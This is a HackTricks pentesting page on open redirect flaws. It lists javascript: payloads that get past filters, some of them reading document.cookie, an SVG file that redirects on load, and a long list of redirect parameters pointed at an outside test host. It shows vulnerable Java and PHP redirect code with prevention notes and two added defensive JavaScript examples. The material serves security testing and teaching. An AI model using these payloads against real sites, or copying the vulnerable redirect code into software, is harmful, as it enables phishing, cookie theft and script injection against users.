hacktricks/pentesting-web/open-redirect.md


Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)

Other ways to support HackTricks

Open Redirect

Redirect to localhost or arbitrary domains

{% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %} url-format-bypass.md {% endcontent-ref %}

Open Redirect to XSS

#Basic payload, javascript code is executed after "javascript:"
javascript:alert(1)

#Bypass "javascript" word filter with CRLF
java%0d%0ascript%0d%0a:alert(0)

#Javascript with "://" (Notice that in JS "//" is a line comment, so a new line is created before the payload). URL double encoding is needed
#This bypasses FILTER_VALIDATE_URL of PHP
javascript://%250Aalert(1)

#Variation of "javascript://" bypass when a query is also needed (using comments or ternary operator)
javascript://%250Aalert(1)//?1
javascript://%250A1?alert(1):0

#Others
%09Jav%09ascript:alert(document.domain)
javascript://%250Alert(document.location=document.cookie)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
javascript://%0aalert(1)
<>javascript:alert(1);
//javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1);
/javascript:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1);
javascript:alert(1)
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript:prompt(1)
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
/x:1/:///%01javascript:alert(document.cookie)/
";alert(0);//

Open Redirect uploading svg files


When a web application allows users to upload files, it can be vulnerable to an open redirect attack if the application does not properly validate the uploaded file's content. This can be exploited by uploading an SVG file containing malicious code that, when accessed by a victim, redirects them to a malicious website.



<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='http://www.example.com'"
xmlns="http://www.w3.org/2000/svg">
</svg>
</code>

Common injection parameters

An open redirect vulnerability exists when a web application allows a user to redirect to an external site by manipulating the URL. This can be exploited by an attacker to redirect users to malicious websites to perform phishing attacks or distribute malware. To identify open redirect vulnerabilities, testers can look for the following common injection parameters:

  • url: Used to specify the target URL for redirection.
  • link: Used to specify the link to redirect to.
  • next: Used to specify the next page to redirect to after a successful action.
  • target: Used to specify the target page for redirection.
  • rurl: Used to specify the URL to redirect to.
  • dest: Used to specify the destination URL for redirection.

By testing these parameters for open redirect vulnerabilities, testers can help improve the security of web applications and protect users from potential attacks.

/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
success=https://c1h2e1.github.io
data=https://c1h2e1.github.io
qurl=https://c1h2e1.github.io
login=https://c1h2e1.github.io
logout=https://c1h2e1.github.io
ext=https://c1h2e1.github.io
clickurl=https://c1h2e1.github.io
goto=https://c1h2e1.github.io
rit_url=https://c1h2e1.github.io
forward_url=https://c1h2e1.github.io
@https://c1h2e1.github.io
forward=https://c1h2e1.github.io
pic=https://c1h2e1.github.io
callback_url=https://c1h2e1.github.io
jump=https://c1h2e1.github.io
jump_url=https://c1h2e1.github.io
click?u=https://c1h2e1.github.io
originUrl=https://c1h2e1.github.io
origin=https://c1h2e1.github.io
Url=https://c1h2e1.github.io
desturl=https://c1h2e1.github.io
u=https://c1h2e1.github.io
page=https://c1h2e1.github.io
u1=https://c1h2e1.github.io
action=https://c1h2e1.github.io
action_url=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
sp_url=https://c1h2e1.github.io
service=https://c1h2e1.github.io
recurl=https://c1h2e1.github.io
j?url=https://c1h2e1.github.io
url=//https://c1h2e1.github.io
uri=https://c1h2e1.github.io
u=https://c1h2e1.github.io
allinurl:https://c1h2e1.github.io
q=https://c1h2e1.github.io
link=https://c1h2e1.github.io
src=https://c1h2e1.github.io
tc?src=https://c1h2e1.github.io
linkAddress=https://c1h2e1.github.io
location=https://c1h2e1.github.io
burl=https://c1h2e1.github.io
request=https://c1h2e1.github.io
backurl=https://c1h2e1.github.io
RedirectUrl=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
ReturnUrl=https://c1h2e1.github.io
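A defender-side use of the parameter list, as an added example that is not part of the original page: it walks already-parsed access-log records and reports 3xx responses whose `Location` host was supplied in a request parameter, whether or not the parameter name is on the list. `shop.example`, `offsite.example`, the record shape and the function names are assumptions constructed for the example.

```javascript
// Added example, not HackTricks code. Host names and records are constructed.
const SITE_HOST = "shop.example";
const BASE = `https://${SITE_HOST}`;
// Lower-cased parameter names taken from the list above (subset).
const KNOWN_PARAMS = new Set(["url", "link", "next", "target", "rurl", "dest",
  "destination", "redir", "redirect", "redirect_uri", "redirect_url", "return",
  "returnto", "return_to", "returnurl", "continue", "goto", "u", "to", "go"]);

// Constructed records, as if already parsed from a proxy or access log.
const SAMPLE = [
  { path: "/login?next=/account", status: 302, location: "/account" },
  { path: "/out?url=https%3A%2F%2Foffsite.example%2F", status: 302,
    location: "https://offsite.example/" },
  { path: "/login?ReturnUrl=%2F%2Foffsite.example%2Fx", status: 302,
    location: "//offsite.example/x" },
  { path: "/search?q=https://offsite.example/", status: 200, location: null },
  { path: "/track?campaign_dst=https://offsite.example/a", status: 301,
    location: "https://offsite.example/a" },
  { path: "/go?u=https://offsite.example/", status: 302,
    location: "https://shop.example/" },
];

// Host a browser would reach for this value, resolved against the site itself.
function hostOf(value) {
  try { return new URL(value, BASE).hostname; } catch { return null; }
}

// Report 3xx responses that left the site for a host named in a request parameter.
function findOpenRedirects(records) {
  const hits = [];
  for (const r of records) {
    if (r.status < 300 || r.status > 399 || !r.location) continue;
    const target = hostOf(r.location);
    if (target === null || target === SITE_HOST) continue; // stayed on-site
    for (const [name, value] of new URL(r.path, BASE).searchParams) {
      if (hostOf(value) === target) {
        hits.push({ path: r.path, param: name, host: target,
                    known: KNOWN_PARAMS.has(name.toLowerCase()) });
      }
    }
  }
  return hits;
}

console.log(findOpenRedirects(SAMPLE));
```

Path-style redirects such as `/redirect/{payload}` carry no query parameter and are not covered by this check.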

Code examples

.Net

Response.Redirect("~/mysafe-subdomain/login.aspx");

Java

Open Redirect

An open redirect occurs when a web application redirects to a user-supplied link without proper validation. Attackers can abuse this vulnerability to redirect users to malicious websites, phishing pages, or other harmful content.

Example

Consider the following vulnerable Java code snippet:

String redirectUrl = request.getParameter("redirect");
response.sendRedirect(redirectUrl);

In this example, the redirect parameter is directly used in the sendRedirect method without any validation. An attacker can craft a malicious link like http://vulnerable-website.com/?redirect=http://malicious-website.com to redirect users to the malicious website.

Prevention

To prevent open redirect vulnerabilities in Java applications, always validate and sanitize user input before using it in redirect functions. Whitelist allowed domains or URLs and ensure that the redirect URL belongs to the expected domain.

response.sendRedirect("http://mysafedomain.com");

PHP

Open Redirect Vulnerability

An open redirect vulnerability exists when a web application allows users to redirect to external URLs. Attackers can exploit this vulnerability to trick users into visiting malicious websites.

Example

Consider the following PHP code snippet:

<?php
    $url = $_GET['url'];
    header("Location: " . $url);
?>

In this code, the application redirects users to the URL specified in the url parameter of the GET request. An attacker can craft a malicious URL like http://example.com/redirect.php?url=http://malicious-site.com to redirect users to a malicious website.

Prevention

To prevent open redirect vulnerabilities, always validate and sanitize user input before using it to redirect users. Whitelist allowed URLs or domains to ensure that only trusted destinations can be redirected to.

<?php
/* browser redirections*/
header("Location: http://mysafedomain.com");
exit;
?>
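The allow-list check that both Prevention notes (Java and PHP) describe, as an added example in JavaScript that is not HackTricks code; JavaScript is used because Node's `URL` class follows the same WHATWG parsing rules a browser applies to a `Location` value. The host `mysafedomain.com` comes from the snippets above; the function names, the `/` fallback, `offsite.example` and the sample inputs are assumptions constructed for the example.

```javascript
// Added example, not HackTricks code. Names and sample values are assumptions.
const APP_ORIGIN = "https://mysafedomain.com";        // host taken from the page's snippets
const ALLOWED_HOSTS = new Set(["mysafedomain.com"]);
const ALLOWED_SCHEMES = new Set(["http:", "https:"]); // drop "http:" on HTTPS-only sites
const FALLBACK = "/";

// Simulates the single percent-decoding a framework applies to a query parameter.
function decodeParam(encoded) {
  try { return decodeURIComponent(encoded); } catch { return null; }
}

// Returns an absolute URL that is safe to put in Location, or FALLBACK.
function safeRedirectTarget(value) {
  if (typeof value !== "string" || value === "") return FALLBACK;
  // Browsers strip tab/CR/LF and treat "\" like "/", so refuse them before parsing.
  if (/[\u0000-\u001f\u007f\\]/.test(value)) return FALLBACK;
  let url;
  try {
    url = new URL(value, APP_ORIGIN); // resolves "/path" and "//host" like a browser
  } catch {
    return FALLBACK;
  }
  if (!ALLOWED_SCHEMES.has(url.protocol)) return FALLBACK; // javascript:, data:, ...
  if (url.username || url.password) return FALLBACK;       // user@host confusion
  if (!ALLOWED_HOSTS.has(url.hostname)) return FALLBACK;   // exact match, no suffix test
  return url.href;
}

// Constructed inputs: payloads quoted from the list above plus off-site targets.
const REJECTED = [
  "javascript:alert(1)",
  "java%0d%0ascript%0d%0a:alert(0)",
  "javascript://%250Aalert(1)",
  "%09Jav%09ascript:alert(document.domain)",
  "//%5cjavascript:alert(1)",
  "/%09/javascript:alert(1)",
  "//offsite.example/login",
  "https://mysafedomain.com@offsite.example/",
  "https://mysafedomain.com.offsite.example/",
];
const ACCEPTED = ["/account/settings?tab=2", "https://mysafedomain.com/login"];

function rejectedCount() {
  return REJECTED.filter((p) => safeRedirectTarget(decodeParam(p)) === FALLBACK).length;
}
console.log(rejectedCount(), "of", REJECTED.length, "rejected;", ACCEPTED.map(safeRedirectTarget));
```

Keeping the `REJECTED` list as a regression test makes a later loosening of the check (for example, replacing the exact host match with a suffix or substring test) fail visibly.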

Tools

Resources
